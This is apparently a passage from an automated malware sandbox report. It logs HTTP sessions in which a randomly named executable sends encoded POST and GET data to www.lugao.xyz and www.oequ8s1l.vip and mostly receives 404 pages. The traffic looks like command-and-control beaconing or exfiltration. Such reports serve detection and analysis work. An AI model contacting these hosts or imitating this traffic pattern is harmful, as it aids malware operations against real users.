Jan 16, 2025 09:24:21.515934944 CET	1236	IN	Data Raw: 6e 74 65 6e 74 20 3d 20 63 6c 6f 75 64 4e 6f 64 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 69 65 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 Data Ascii: ntent = cloudNode; /ie/ document.getElementById("ip").innerText = ip; document.getElementById("cloud_node").innerText = cloudNode; }; /** * IE8
Jan 16, 2025 09:24:21.515944958 CET	292	IN	Data Raw: 28 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 65 38 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 52 65 73 70 6f 6e 64 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: (); if (ie8) { screenRespond(); } }; window.onresize = function () { if (ie8) { screenRespond(); } };

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50015	149.104.185.93	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:23.194547892 CET	481	OUT	GET /izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ= HTTP/1.1 Host: www.oequ8s1l.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:24:24.078749895 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:23 GMT Content-Type: text/html Content-Length: 7932 Connection: close Set-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ ETag: "6785cace-1efc" Server: nginx Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 57 20 57 41 46 43 44 4e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f [TRUNCATED] Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>NEW WAFCDN 404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> /css reset start/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; [TRUNCATED]
Jan 16, 2025 09:24:24.078803062 CET	1236	IN	Data Raw: 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e Data Ascii: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } article, aside, details, figcaption, figure, footer, header, hgroup,
Jan 16, 2025 09:24:24.078814030 CET	1236	IN	Data Raw: 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 36 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 66 6f Data Ascii: n{margin-top: 309px;} #err_code{font-size: 136px;font-style: italic;font-weight: 300;color:#00A2Ca;} #tpis_cn{margin-left: 20px;font-size: 40px;color:#333;} .err-tips-en{margin-top: 22px;font-size: 55px;colo
Jan 16, 2025 09:24:24.078819990 CET	672	IN	Data Raw: 20 20 20 2e 65 72 72 2d 74 69 70 73 2d 65 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 35 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 6f 73 74 2d 69 6e 66 6f 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 7d 0a 20 20 20 Data Ascii: .err-tips-en{font-size: 35px;} .host-info{font-size: 20px;} } @media screen and (min-width:360px) and (max-width:519px){ .err-tips-cn{margin-top: 250px;} #err_code{fon
Jan 16, 2025 09:24:24.078825951 CET	1236	IN	Data Raw: 73 69 7a 65 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 69 65 39 e4 bb a5 e4 b8 8b e7 89 88 e6 9c ac e6 a8 a1 e6 8b 9f e5 aa 92 e4 bd 93 e6 9f a5 e8 af a2 2a 2f 0a 0a 20 20 20 Data Ascii: size: 10px;} } /ie9/ .w992 .err-tips-cn{margin-top: 200px;} .w992 #err_code{font-size: 120px;} .w992 #tpis_cn{font-size: 40px;} .w992 .er
Jan 16, 2025 09:24:24.078831911 CET	1236	IN	Data Raw: 20 31 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a Data Ascii: 10px;} </style> </head> <body> <div class="container"> <div class="main"> <div class="err-tips-cn"> <span id="err_code">404</span><span id="tpis_cn"> !</spa
Jan 16, 2025 09:24:24.078844070 CET	1236	IN	Data Raw: 8a e5 85 b6 e4 bb a5 e4 b8 8b e7 89 88 e6 9c ac e6 b5 8f e8 a7 88 e5 99 a8 e6 a8 a1 e6 8b 9f 43 53 53 33 e5 aa 92 e4 bd 93 e6 9f a5 e8 af a2 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 63 Data Ascii: CSS3 */ var screenRespond = function () { var windWidth = document.compatMode === "CSS1Compat" ? document.documentElement.clientWidth : document.body.clientWid
Jan 16, 2025 09:24:24.078852892 CET	59	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: }; </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50016	172.67.147.28	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:29.136481047 CET	732	OUT	POST /qixh/ HTTP/1.1 Host: www.lugao.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.lugao.xyz Referer: http://www.lugao.xyz/qixh/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 34 54 6b 6b 66 33 72 78 4e 38 56 65 6d 4d 6e 74 78 6a 2b 4c 5a 6a 44 42 57 4f 6a 6b 59 37 70 79 35 67 6a 4c 4f 6c 36 43 78 6b 37 6a 36 57 32 32 53 70 66 70 69 51 6c 63 75 6b 52 67 2b 66 2f 51 39 70 54 78 55 79 6c 2f 5a 76 51 61 32 48 52 78 34 44 6d 35 59 73 4e 45 73 56 33 58 4b 48 73 37 58 6f 74 31 41 74 37 76 33 51 57 46 7a 4b 32 44 69 39 4c 4d 52 35 36 2b 4e 57 6f 39 33 63 51 54 7a 33 65 38 39 62 43 45 51 6e 66 74 42 39 41 44 6c 6e 52 6f 4b 32 35 53 76 58 45 66 50 36 67 4b 41 5a 42 5a 55 6b 52 56 48 35 42 4e 57 6e 34 47 31 7a 33 68 63 62 46 34 66 58 30 51 35 62 65 55 65 41 3d 3d Data Ascii: BXc8V=4Tkkf3rxN8VemMntxj+LZjDBWOjkY7py5gjLOl6Cxk7j6W22SpfpiQlcukRg+f/Q9pTxUyl/ZvQa2HRx4Dm5YsNEsV3XKHs7Xot1At7v3QWFzK2Di9LMR56+NWo93cQTz3e89bCEQnftB9ADlnRoK25SvXEfP6gKAZBZUkRVH5BNWn4G1z3hcbF4fX0Q5beUeA==
Jan 16, 2025 09:24:30.020107031 CET	988	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4ITjcmxa2kMppj5uZYQA3ULZ9AW9eYTiVqFdH91U6iwsUKrPd4hA7E8ip%2BRNHmVmZr1bSTrhWpeJv2v3Xy7PPyOtHoqT5zOzlFe4kmf5UcBvMXKz0xzg8awdNdj3WP6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902cb5a0a86dac31-YYZ Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14235&min_rtt=14235&rtt_var=7117&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50017	172.67.147.28	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:31.686389923 CET	752	OUT	POST /qixh/ HTTP/1.1 Host: www.lugao.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.lugao.xyz Referer: http://www.lugao.xyz/qixh/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 34 54 6b 6b 66 33 72 78 4e 38 56 65 6e 73 58 74 77 45 4b 4c 4d 54 44 65 61 75 6a 6b 52 62 6f 31 35 67 6e 4c 4f 6e 57 53 78 32 66 6a 39 33 47 32 41 59 66 70 76 77 6c 63 6d 45 52 70 78 2f 2f 66 39 70 50 58 55 77 78 2f 5a 76 45 61 32 46 5a 78 34 51 4f 36 5a 38 4d 69 31 46 32 78 4f 48 73 37 58 6f 74 31 41 74 75 34 33 51 2b 46 7a 36 47 44 6b 63 4c 4c 50 70 36 68 4b 57 6f 39 7a 63 51 58 7a 33 65 4f 39 61 65 36 51 6c 58 74 42 38 77 44 6d 32 52 72 5a 57 35 75 77 48 46 56 66 36 42 63 45 49 6c 58 61 45 39 76 48 36 42 73 61 42 31 63 6b 43 57 32 4f 62 68 4c 43 51 39 6b 30 59 6a 64 46 41 41 50 59 68 43 54 2f 35 70 64 59 2f 72 69 44 70 65 6e 4a 49 51 3d Data Ascii: BXc8V=4Tkkf3rxN8VensXtwEKLMTDeaujkRbo15gnLOnWSx2fj93G2AYfpvwlcmERpx//f9pPXUwx/ZvEa2FZx4QO6Z8Mi1F2xOHs7Xot1Atu43Q+Fz6GDkcLLPp6hKWo9zcQXz3eO9ae6QlXtB8wDm2RrZW5uwHFVf6BcEIlXaE9vH6BsaB1ckCW2ObhLCQ9k0YjdFAAPYhCT/5pdY/riDpenJIQ=
Jan 16, 2025 09:24:32.588870049 CET	990	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66lTVBp9VBAc63X7UODifyVyI2nX2HG4jeiMxZ8eDXJUpaEWaH%2FD6HXOkoRGK4B7BLQfsF4cAKm0gSfgqROk%2BoNeOGaIpFhY%2B2OpBGebKaHERe8CPZzAjqDcZEPL3CmA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902cb5b0887843c9-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50018	172.67.147.28	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:34.283612013 CET	10834	OUT	POST /qixh/ HTTP/1.1 Host: www.lugao.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.lugao.xyz Referer: http://www.lugao.xyz/qixh/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 34 54 6b 6b 66 33 72 78 4e 38 56 65 6e 73 58 74 77 45 4b 4c 4d 54 44 65 61 75 6a 6b 52 62 6f 31 35 67 6e 4c 4f 6e 57 53 78 32 58 6a 39 46 2b 32 53 4c 6e 70 67 51 6c 63 73 6b 52 73 78 2f 2f 34 39 70 58 62 55 77 74 76 5a 74 38 61 6e 58 68 78 76 52 4f 36 51 38 4d 69 39 6c 33 57 4b 48 73 75 58 6f 39 50 41 74 2b 34 33 51 2b 46 7a 34 75 44 7a 64 4c 4c 4e 70 36 2b 4e 57 6f 35 33 63 51 76 7a 33 58 35 39 61 62 50 58 57 76 74 45 73 67 44 31 77 46 72 61 32 35 57 7a 48 45 41 66 36 4d 43 45 49 34 6f 61 45 35 46 48 39 78 73 4a 32 45 57 32 51 4b 69 4d 5a 68 45 65 48 4e 30 78 76 66 73 43 6a 51 36 57 30 43 45 67 39 35 46 55 64 54 73 58 5a 36 55 57 4f 35 56 55 62 79 52 32 74 4b 4b 32 75 36 34 70 70 68 45 30 53 32 6b 62 35 36 75 55 6d 6c 78 6e 6a 36 33 62 6e 45 72 34 71 54 43 35 6e 4a 54 68 6f 49 4b 68 54 45 61 76 43 66 6e 64 73 67 70 4a 4c 43 36 35 4f 77 52 41 6a 45 57 66 51 39 5a 5a 4c 49 5a 70 54 72 35 58 5a 6f 4a 6f 41 53 31 46 75 4a 57 41 73 43 4e 52 5a 42 72 6c 41 4c 4c 4c 4d 64 6a 51 41 48 61 [TRUNCATED] Data Ascii: BXc8V=4Tkkf3rxN8VensXtwEKLMTDeaujkRbo15gnLOnWSx2Xj9F+2SLnpgQlcskRsx//49pXbUwtvZt8anXhxvRO6Q8Mi9l3WKHsuXo9PAt+43Q+Fz4uDzdLLNp6+NWo53cQvz3X59abPXWvtEsgD1wFra25WzHEAf6MCEI4oaE5FH9xsJ2EW2QKiMZhEeHN0xvfsCjQ6W0CEg95FUdTsXZ6UWO5VUbyR2tKK2u64pphE0S2kb56uUmlxnj63bnEr4qTC5nJThoIKhTEavCfndsgpJLC65OwRAjEWfQ9ZZLIZpTr5XZoJoAS1FuJWAsCNRZBrlALLLMdjQAHaNC7himQh5QG3gv48mzH0L7dDfwefplvQ91Rm326gCbJP0sgJ6Z8sihNsfPDRt6dkhRKjABB566YHFArC53g05m2CbI4dpFTncNpkr6lBiVAF3QmYQBjOYUmeVsC2ZyNgj8vLi4MEvBZXw2LU0/aj0FhvGo4utwKwm7fcAqZLefy1+F6xWEyM4nIpvZnkXcittK21ceAZDTxP27QWTahVx4xz2HwrnpJfHFZsTNMr3vT40b9BX4kkc2eSylIe8whPqD+YIug1wPMgflp7pCtvA1mtkkK1iz4/Qx2l8ujdUZ9ok0GGFXNF/FPVrdv3gre+zsXprNxV3NasnClMza8GrK/RWZbVB4zA2Z2qR7Sc78KJAvpuBGFN4rjpy4pgrWsVi5vTLTxXasqPnnwNBa83CKj61oAmwcw0xChyby0FRVMSlTLYAVGle3b+Ym8muF8nlyc5dlLEFGs0krl0n7nUAvNwpOb3xLK6SSrSZFBjwLxmS9GlYP1dPJ03cPhWt0ZxhTq1Lunb2ugPJ/0fgsHe1Bb6scANn4y7srUpeRu4AFvfpwRYTD0YUK8adO1HkX1bcN6FmnyJJQvHclwMAGxEVvg2gGMQ12GRXpF21Ho5riu6KjvP56FJWhOio2FC8boJy7U+6RNPiMszWh091kbXlIOn9HbRXLqUS6 [TRUNCATED]
Jan 16, 2025 09:24:34.954051018 CET	991	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQ7mn9mopVHcObdpTm%2BYgsXPVgudGPkOeXjN7bpeZ2Q5yXyeOrVigxyKQg0nMUzuIu3Z1iBeCB2eXn0QCRckIkNFJcoWqQSA6kE2HFAy99bNQzl2CYOTuGtjXsO0Y9Rl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902cb5c0cd49ab6a-YYZ Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14061&min_rtt=14061&rtt_var=7030&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 4d ca 74 5c f4 f6 52 b5 20 ae 5d ba 7a f0 7e 3e 1e 06 1d 92 ab 2b 0c ec c9 a1 46 4d ec da 6d 0b e7 a2 70 28 f7 4c 68 5f 26 da 67 a5 ae b0 2b 34 2f 7a e5 ac 2c 0e 43 f3 bd 08 8d 43 fb 8e 17 b6 b8 b5 5c 46 ce c2 93 ce 9f b9 5d 89 76 7d b3 31 06 3c 8c 9e 28 e6 1e b4 00 c5 c9 77 89 e1 74 39 ee c1 67 82 5d 90 32 30 dc 24 72 a6 34 03 8b 14 81 d1 f7 0c c6 fc 11 bf 46 3c 00 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aaM0a<@.lDn<AM Mt\R ]z~>+FMmp(Lh_&g+4/z,CC\F]v}1<(wt9g]20$r4F<(0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50019	172.67.147.28	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:37.793531895 CET	478	OUT	GET /qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.lugao.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:24:38.674061060 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rC0cfyxn%2F8fo7tkr15sJjVRMskje9PB%2BO28UjVYNxUegWBlkIGfCWqSRKlO3oeXWyXM6l32tOaSXtPP7uGfSPiGmGAok0%2FOnZaMnePSndS6Sp7n6OphxLQX05uC%2F96Ri"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902cb5d6ce4caae5-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14176&min_rtt=14176&rtt_var=7088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=478&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disabl
Jan 16, 2025 09:24:38.674123049 CET	117	IN	Data Raw: 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f Data Ascii: e MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50020	199.59.243.228	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
